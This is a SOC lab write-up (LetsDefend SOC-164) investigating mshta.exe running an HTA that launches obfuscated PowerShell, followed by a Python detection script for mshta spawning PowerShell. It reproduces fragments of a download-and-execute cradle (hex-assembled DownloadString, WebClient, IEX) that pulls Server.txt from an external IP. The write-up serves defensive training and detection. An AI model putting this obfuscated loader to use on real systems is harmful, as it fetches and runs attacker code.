LetsDefend SOC-164: Suspicious Mshta Behavior
We have a new alert regarding a low-reputation HTA file executed via mshta.exe.
What is an HTA file?
HTA stands for HTML Application. It’s a type of file that can contain HTML, CSS, JavaScript, and other web-based code. HTA files are executable, meaning they can run code directly on your system, making them more powerful (and potentially dangerous) than regular HTML files.
What is mshta.exe?
Mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files.
To briefly summarize: after some research, we identified that the alert relates to a LOLBAS (Living Off The Land Binaries, Scripts, and Libraries) technique. Essentially, this is a method that abuses legitimate, native Microsoft binaries for malicious purposes.
Now we can move to the Endpoint Security section and search for Roberto's machine, aka 172.16.17.38.
In terminal history, we see some juicy stuff.
The command C:/Windows/System32/mshta.exe C:/Users/roberto/Desktop/Ps1.hta indicates that the mshta.exe utility is being used to execute a file named Ps1.hta located on the desktop of a user named "Roberto". .ps1 is typically the extension you would find on a PowerShell script.
The methodology exploited is already known if we search online for more information, as you can see below:
The next step is the execution of a malicious, obfuscated PowerShell script, broken down as follows:
Function H1: the function H1($i) takes a hexadecimal string $i, converts each pair of characters into the corresponding ASCII character, and concatenates them into a readable string $r.
Creating a WebClient object: $H2 = (new-object ('{1}{0}{2}' -f'WebCL','net.','ient')); creates a System.Net.WebClient object. The -f format operator reorders the fragments 'net.', 'WebCL' and 'ient' into the type name "net.WebClient", so the string "WebClient" never appears literally in the script. The System.Net.WebClient class is used to download data from the web, and the obfuscation is employed to avoid detection.
Hexadecimal strings:
$H3 = H1 '446f776E'; converts '446f776E' to 'Down'.
$H4 = H1 '6C6f'; converts '6C6f' to 'lo'.
$H5 = H1 '616473747269'; converts '616473747269' to 'adstri'.
$H6 = H1 '6E67'; converts '6E67' to 'ng'.
These are combined ($H7 = $H3+$H4+$H5+$H6) to form 'DownloadString'.
Downloading and executing the remote script: $H8 = $H2.$H7('http://193.142.58.23/Server.txt'); downloads the content of the URL into $H8 using the DownloadString method. iEX (Invoke-Expression) $H8 then executes the downloaded content, which is PowerShell code.
Now we have a clearer idea of what is going on and can proceed further with our analysis.
On VirusTotal we can already see that the IP 193.142.58.23 is flagged as malicious.
We can also move on to analyze the logs.
The log entry shows that at 10:29 AM on March 5, 2022, a device with the IP address 172.16.17.38 on port 42611 attempted to make an HTTP request to 193.142.58.23 on port 80. The requested URL was http://193.142.58.23/Server.txt.
This log entry indicates an outbound connection attempt from a local device to a remote server, likely trying to download or interact with the file Server.txt.
If we analyze the processes, we can also see that mshta.exe is spawning PowerShell as a child process. As such, looking for mshta.exe launching powershell.exe could serve as a high-fidelity detection analytic for this specific behavior.
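As an added example (not part of the original writeup), here is the parent/child analytic from the previous paragraph expressed in Python over constructed process-creation events, with field names following the Sysmon Event ID 1 layout (ParentImage, Image, CommandLine). It flags mshta.exe spawning powershell.exe and, as an additional heuristic that is my assumption rather than something the lab states, mshta.exe executing an .hta file from a user profile path, which matches the Desktop location seen in this case. The event records are illustrative, not logs exported from the lab.

```python
import ntpath
import re

# Constructed sample process-creation events in Sysmon Event ID 1 style.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"C:\Windows\System32\mshta.exe C:\Users\roberto\Desktop\Ps1.hta"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe"},  # benign: launched by the shell, not by mshta
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt"},
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Assumed heuristic: an .hta argument under C:\Users\<name>\... (Desktop, Downloads, Temp).
USER_PATH_HTA = re.compile(r"\\users\\[^\\]+\\.*\.hta\b", re.IGNORECASE)

def image_name(path: str) -> str:
    """Normalise a Windows image path to its lowercase file name."""
    return ntpath.basename(path).lower()

def evaluate_event(event: dict) -> list[str]:
    """Return the names of the analytics an event triggers (empty list if none)."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    # Analytic 1 (from the writeup): mshta.exe launching PowerShell.
    if parent == "mshta.exe" and child in POWERSHELL_IMAGES:
        hits.append("mshta_spawns_powershell")
    # Analytic 2 (assumption): mshta.exe executing an .hta from a user profile path.
    if child == "mshta.exe" and USER_PATH_HTA.search(cmdline):
        hits.append("mshta_hta_from_user_path")
    return hits

def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every analytic over a list of events; returns (event_index, analytic) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in evaluate_event(ev)]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The parent/child rule is the high-fidelity one: PowerShell started directly by the shell is everyday activity and is deliberately not flagged, while PowerShell whose parent is mshta.exe has very few legitimate explanations and is worth an immediate look.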
Conclusion: This alert is a true positive. The attacker exploited a LOLBAS to execute malicious code.